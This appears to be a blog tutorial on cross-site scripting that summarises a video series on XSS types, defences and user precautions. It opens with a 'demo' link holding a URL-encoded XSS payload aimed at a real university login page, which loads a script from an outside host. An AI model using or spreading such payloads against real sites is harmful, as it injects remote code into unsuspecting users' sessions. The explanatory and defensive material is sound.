XSS attacks , what it is ? Complete tutorials .

Before going into the topic i need to show u all a demo , 

click the link below to see a demo on XSS attack

http://tcenet.tce.edu/py/ident/login_fail.py?page_error=%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%79%6F%75%72%6A%61%76%61%73%63%72%69%70%74%2E%63%6F%6D%2F%33%31%34%31%30%31%31%31%33%32%36%32%2F%74%63%65%2E%6A%73%22%20%3E%0A%0A%3C%2F%73%63%72%69%70%74%3E

[ done for education purpose]

Cross Site Scripting (XSS) is a code injection vulnerability found in web applications and is generally used by malicious hackers to hijack a legitimate user's session with the website. XSS vulnerabilities are caused because of improper validation of user input by the Server and then sending this invalidated input back to the user in some exploitable form. A great resource to track the latest XSS vulnerable software, websites and latest research is XSSed.com






In this 4 part video series Arne from Aachen Method gives a detailed primer on XSS.

1. Quick Overview: This video explains the basics of XSS, kinds of XSS - Persistent, Non-Persistent and DOM based.



2. Protecting your Website against XSS Attacks: This video explains various techniques which can be used to mitigate XSS vulnerabilities on your website - input / output validation, modification of output tags etc.



3. Finding XSS weaknesses in websites: Pointer to Rsnake's website http://ha.ckers.org/xss.html



4. Protecting yourself from XSS attacks as a user: By turning off scripts, not clicking on untrusted links etc.

Source: securitytube dot net.

Posted in: XSS website attacks